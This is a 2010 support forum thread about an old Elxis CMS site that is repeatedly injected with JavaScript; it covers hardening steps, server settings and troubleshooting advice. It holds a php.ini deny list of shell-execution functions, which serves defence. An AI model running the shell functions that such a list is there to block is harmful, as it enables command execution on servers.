Elxis CMS Forum
Support => Security => Topic started by: kalexan on September 24, 2010, 13:11:00
-
Hello.
I created a website 3-4 years ago using Elxis 2006.4. I also added star gallery 1.7 and letterman components , I created a bot to easily add a gallery inside articles and I made a few more modifications at menu system, template system and other.
For more than 6 months the site is being hit by hackers. After every attack, all html and php files contain a javascript code (XXS attack). I have checked thoroughly the site's logs and I haven't found out how this is done. I also have taken the following measures:
- Password protect the admin directory (http authentication)
- Added the following lines to php.ini
register_globals = Off
allow_url_fopen = Off
disable_functions = proc_open , popen, disk_free_space, diskfreespace, set_time_limit, leak, tmpfile, exec, system, shell_exec, passthru- Enabled Elxis Defender using various key filters (including a lot of php and SQL keywords)
The site owner has requested me to find the security hole but with no luck. Upgrade is not an option, since I would have to change stargallery and letterman with new components (they are not supported any more and they probably are incompatible with the latest Elxis ). I would also have to apply all modifications I made again.
I would appreciate any help or hint on this. Thank you all in advance.
-
More likely one of the following things happens:
1. You have a virus on your computer. If you have any tool bars installed in your browser remove them. Make sure there are no malicious programs in your computer and especially in your browser and your FTP client.
2. When you are logged-in in Elxis administration close all other open windows. If you browse other sites (especially suspicious ones) during you are logged in if there is a bad javascript code in the other site the js script can steal your data.
It would be really interested to tell us some information regarding the elxis environment. Which is your server's OS, the php version, how php runs (apache module, cgi, suphp, etc) , the control panel of the server and if the php setup fulfills a minimum security level (registered globals, allow url fopen, etc).
-
Thank you for the quick response!
As far as my customer's computer is concerned, I know he has an updated antivirus software installed. I will ask him on any unusual window's behavior, but I don't think that this is the case. Moreover, my computer is clean of trojans and viuses for sure (I also have a commercial anti virus software installed), and I don't use any adaware crap or browser plugins (except, of course, the priceless Firebug, Web Developer, SeoQuake etc plugins of firefox )!
About the server environment, here is a copy-paste from elxis system information tab:
Έκδοση Βάσης Δεδομένων: mysql 5.1.50 (Έκδοση: 5.1.50)
Έκδοση PHP: 5.2.13
Web Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Διασύνδεση WebServer με PHP: cgi-fcgi
Έκδοση Elxis CMS 2006.4 Stable rev1080 [ Nestor ] 04-December-2006 23:08 GMT+2
Περιηγητής: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.13) Gecko/20100914 Firefox/3.5.13 ( .NET CLR 3.5.30729)
Σχετικές Ρυθμίσεις της PHP:
Safe Mode: OFF
Open basedir: none
Εμφάνιση Σφαλμάτων: ON
Short Open Tags: ON
Ανέβασμα Αρχείων: ON
Magic Quotes: ON
Register Globals: OFF
Output Buffering: OFF
Session save path: none
Session auto start: 0
Ενεργοποιημένη XML: Yes
Ενεργοποιημένη Zlib: Yes
Απενεργοποιημένες Λειτουργίες: proc_open , popen, disk_free_space, diskfreespace, set_time_limit, leak, tmpfile, exec, system, shell_exec, passthru
Κειμενογράφος WYSIWYG: TinyMCE WYSIWYG Editor (sorry for the greek labels)
All appropriate security measures for php are taken through directives set in php.ini files inside every core folder of Elxis (root directory and all sub-directories)
Finally all folder and file permissions are checked and seem to be ok.
I have got a feeling that the problem resides to TinyMCEs image browser plugin iBrowser. I can't de-activate it because my customer uses it extensively. Any thoughts on this?
Thank you again for your support.
-
I suggest you:
1. check the source code of any third party module / component / bot that you install even if it is not published of javascript that don't belong.
2. also check the file system with updiag.
3. check the log files
Feather if you need any help don't hesitate to contact me.
-
@Sirigos: Thanks for you answer.
1) I have got a backup of clean files that I use them to overwrite infected ones
2) What is that? If it is an OScommand I can't use cause as I said the website is at a reseller hosting environment.
3) I have already checked log files but I haven't found something strange
I just renamed ibrowser plugin folder and made the appropriate adjustments to tiny_mce's plugins configuration system. I will keep you informed on how things will go on.
Thank you for your support!
-
2) on your elxis version in administration area -> Tools -> Updiag is available ?
-
Unfortunately no. It must have been added at next versions of Elxis.
The good thing is that for 3 days the site is running smoothly. I keep track of te site log files in case I see something strange and I will post my results back here
-
OK, if you need any help.
Send me PM with full access to check it.